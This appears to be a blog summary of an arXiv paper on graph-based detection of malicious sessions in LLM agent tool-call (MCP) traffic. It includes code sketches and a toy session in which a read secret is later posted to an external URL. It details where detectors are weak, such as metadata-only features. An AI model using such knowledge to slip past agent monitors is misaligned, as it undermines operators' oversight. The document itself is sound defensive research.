arXiv: Content-Aware Attack Detection in LLM Agent Tool-Call Traffic

2026-05-25 Research by al-ice.ai Editorial

AI relevance: As the Model Context Protocol (MCP) becomes the dominant tool-calling interface for LLM agents, detecting malicious tool-call sessions in real time remains an unsolved operational problem. This paper provides the first systematic evaluation of learned detectors over MCP traffic.

Sultan Zavrak and collaborators published arXiv:2605.11053 (v3, updated May 22), proposing a graph-based attack detection framework for MCP tool-call traffic. The approach encodes each agent session as a graph (tool calls as nodes, sequential and data-flow links as edges) and enriches nodes with sentence-embedding features over arguments and responses.
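To make the session-graph idea concrete, here is a minimal sketch of one way such a graph could be assembled. It is not the paper's implementation: the `ToolCall` and `SessionGraph` types, the `build_session_graph` function, and especially the substring heuristic used to infer data-flow links are all assumptions made for illustration, and the tool names and values in the example are invented.

```python
from dataclasses import dataclass, field


@dataclass
class ToolCall:
    """One node: a single tool invocation in an agent session (hypothetical schema)."""
    tool: str
    arguments: str  # serialized arguments
    response: str   # serialized response


@dataclass
class SessionGraph:
    nodes: list
    edges: set = field(default_factory=set)  # (src_index, dst_index, kind)


def build_session_graph(calls, min_token_len=6):
    """Build sequential and data-flow edges over an ordered list of tool calls.

    Assumption: a data-flow link i -> j exists when a sufficiently long
    whitespace-separated token from call i's response reappears in call j's
    arguments. The paper may derive these links differently.
    """
    graph = SessionGraph(nodes=list(calls))

    # Sequential edges connect each call to the next one in the session.
    for i in range(len(calls) - 1):
        graph.edges.add((i, i + 1, "sequential"))

    # Data-flow edges connect a call to any later call that reuses its output.
    for i, src in enumerate(calls):
        tokens = {t for t in src.response.split() if len(t) >= min_token_len}
        for j in range(i + 1, len(calls)):
            if any(t in calls[j].arguments for t in tokens):
                graph.edges.add((i, j, "data_flow"))

    return graph


# Invented example session: a secret read by one tool is later sent out by another.
example_calls = [
    ToolCall("read_file", "path=/srv/notes.txt", "token sk-12345678"),
    ToolCall("list_dir", "path=/tmp", "a.txt b.txt"),
    ToolCall("http_post", "url=https://example.test body=sk-12345678", "200 OK"),
]
graph = build_session_graph(example_calls)
```

In this toy session the data-flow edge from the first call to the third is the kind of structure a metadata-only view would miss, since it only appears once argument and response content is inspected.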

Key findings

Content-level features are essential. Metadata-only detection plateaus around AUROC 0.64 regardless of architecture. Adding SBERT content embeddings pushes AUROC above 0.89, with tree ensembles on pooled embeddings reaching 0.975.
Naive random-split evaluations inflate results by up to 26 percentage points compared to task-disjoint splits. This memorization confound has not been addressed in prior agent-detection literature.
Simple models outperform complex ones. Tree ensembles on pooled SBERT embeddings (AUROC 0.975) outperformed GNNs (GraphSAGE at 0.917) and an MLP (0.896) in the primary RAS-Eval setting.
Self-supervised pre-training provided no label-efficiency advantage on this detection task, contrary to expectations from other NLP domains.
The study evaluated three GNN architectures (GAT, GCN, GraphSAGE), an MLP baseline, and classical models (XGBoost, random forest, logistic regression, linear SVM) across RAS-Eval, ATBench, and a combined-source variant.
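The "pooled embeddings" referred to above turn a variable-length session into one fixed-length feature vector that a tree ensemble can consume. The sketch below shows one plausible pooling step in plain Python. The function name `pool_session` and the choice of concatenated mean and max pooling are assumptions, since the summary does not say which pooling operator the authors use, and the toy vectors stand in for real sentence embeddings.

```python
def pool_session(node_embeddings):
    """Collapse per-call embedding vectors into one fixed-length session vector.

    Assumption: mean pooling concatenated with max pooling. Other operators
    (mean only, sum, attention-weighted) would fit the same interface.
    """
    if not node_embeddings:
        raise ValueError("session has no tool calls to pool")

    dim = len(node_embeddings[0])
    if any(len(vec) != dim for vec in node_embeddings):
        raise ValueError("all node embeddings must share one dimension")

    count = len(node_embeddings)
    mean_part = [sum(vec[k] for vec in node_embeddings) / count for k in range(dim)]
    max_part = [max(vec[k] for vec in node_embeddings) for k in range(dim)]

    # Output length is 2 * dim regardless of how many calls the session had.
    return mean_part + max_part


# Toy 2-dimensional "embeddings" for a three-call session.
toy_session = [[0.0, 1.0], [2.0, 3.0], [4.0, -1.0]]
session_vector = pool_session(toy_session)
```

In a real pipeline each inner list would come from a sentence-embedding model applied to a call's arguments and response, and `session_vector` would be one row of the feature matrix passed to a classifier such as a random forest or gradient-boosted trees.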

Why it matters

Most MCP deployments today rely on prompt-based safety or allow/deny lists. This work shows that learned detection is feasible with the right feature engineering, but also warns that evaluation methodology matters enormously — results inflated by random splits may give false confidence in production.

What to do

If you operate MCP servers or agent tool-call pipelines, incorporate content-level features (not just metadata) into any detection logic.
Use task-disjoint evaluation splits when testing detection models — random splits will overestimate real-world performance.
Don't assume GNNs are automatically superior; tree ensembles on pooled embeddings may give better results at lower computational cost.
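A task-disjoint split, as recommended above, can be sketched in a few lines. The idea is to assign whole tasks, not individual sessions, to the test set, so that no task seen in training reappears at evaluation time. The `task_id` field, the `task_disjoint_split` function, and the example records are hypothetical; how tasks are identified depends on the dataset.

```python
import random


def task_disjoint_split(sessions, test_fraction=0.25, seed=0):
    """Split sessions so that train and test never share a task.

    Assumption: each session is a dict carrying a "task_id" key that
    identifies the underlying agent task it was generated from.
    """
    task_ids = sorted({s["task_id"] for s in sessions})

    # Shuffle tasks (not sessions) with a fixed seed for reproducibility.
    rng = random.Random(seed)
    rng.shuffle(task_ids)

    # Hold out at least one whole task for testing.
    n_test = max(1, round(len(task_ids) * test_fraction))
    test_tasks = set(task_ids[:n_test])

    train = [s for s in sessions if s["task_id"] not in test_tasks]
    test = [s for s in sessions if s["task_id"] in test_tasks]
    return train, test


# Invented example: 4 tasks, each with one benign and one attack session.
example_sessions = [
    {"task_id": f"task-{t}", "label": label}
    for t in range(4)
    for label in ("benign", "attack")
]
train_set, test_set = task_disjoint_split(example_sessions)
```

A random split over `example_sessions` could place the benign and attack variants of the same task on opposite sides of the split, which lets a model score well by recognising the task. That is the memorization effect the paper reports as inflating results.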
